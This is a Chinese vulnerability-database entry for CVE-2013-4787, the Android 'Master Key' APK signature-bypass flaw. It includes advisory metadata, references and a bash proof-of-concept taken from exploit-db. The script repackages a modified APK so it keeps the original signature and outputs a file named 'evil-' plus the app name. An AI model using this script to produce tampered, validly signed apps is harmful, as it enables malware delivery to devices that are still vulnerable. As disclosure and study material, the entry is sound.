Android Donut/Jelly Bean APK 任意代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121743 漏洞类型 加密问题
发布时间 2013-07-03 更新时间 2013-07-10
CVE编号 CVE-2013-4787 CNNVD-ID CNNVD-201307-154
漏洞平台 Android CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/38627
https://www.securityfocus.com/bid/60952
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201307-154
|漏洞详情
GoogleChrome是美国谷歌(Google)公司开发的一款Web浏览器。Android是美国谷歌(Google)公司和开放手持设备联盟(简称OHA)共同开发的一套以Linux为基础的开源操作系统。Android1.6Donut至4.2JellyBean版本中存在漏洞,该漏洞源于程序没有正确对应用程序检查加密签名。攻击者可通过修改的方式不违反加密签名的应用程序数据包文件(APK),利用该漏洞执行任意代码。
|漏洞EXP
#source: http://www.securityfocus.com/bid/60952/info
#
#Google Android is prone to a remote security-bypass vulnerability.
#
#Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions. This may aid in further attacks. 

#!/bin/bash
# PoC for Android bug 8219321 by @pof
# +info: https://jira.cyanogenmod.org/browse/CYAN-1602
if [ -z $1 ]; then echo "Usage: $0 <file.apk>" ; exit 1 ; fi
APK=$1
rm -r out out.apk tmp 2>/dev/null
java -jar apktool.jar d $APK out
#apktool d $APK out
echo "Modify files, when done type 'exit'"
cd out
bash
cd ..
java -jar apktool.jar b out out.apk
#apktool b out out.apk
mkdir tmp
cd tmp/
unzip ../$APK
mv ../out.apk .
cat >poc.py <<-EOF
#!/usr/bin/python
import zipfile
import sys
z = zipfile.ZipFile(sys.argv[1], "a")
z.write(sys.argv[2])
z.close()
EOF
chmod 755 poc.py
for f in `find . -type f |egrep -v "(poc.py|out.apk)"` ; do ./poc.py out.apk "$f" ; done
cp out.apk ../evil-$APK
cd ..
rm -rf tmp out
echo "Modified APK: evil-$APK"
|受影响的产品
Google Android 0
|参考资料

来源:plus.google.com
链接:https://plus.google.com/113331808607528811927/posts/GxDA6111vYy
来源:jira.cyanogenmod.org
链接:https://jira.cyanogenmod.org/browse/CYAN-1602
来源:www.zdnet.com
链接:http://www.zdnet.com/google-releases-fix-to-oems-for-blue-security-android-security-hole-7000017782/
来源:BID
名称:60952
链接:http://www.securityfocus.com/bid/60952
来源:OSVDB
名称:94773
链接:http://www.osvdb.org/94773
来源:review.cyanogenmod.org
链接:http://review.cyanogenmod.org/#/c/45251/
来源:bluebox.com
链接:http://bluebox.com/corporate-blog/bluebox-uncovers-android-master-key/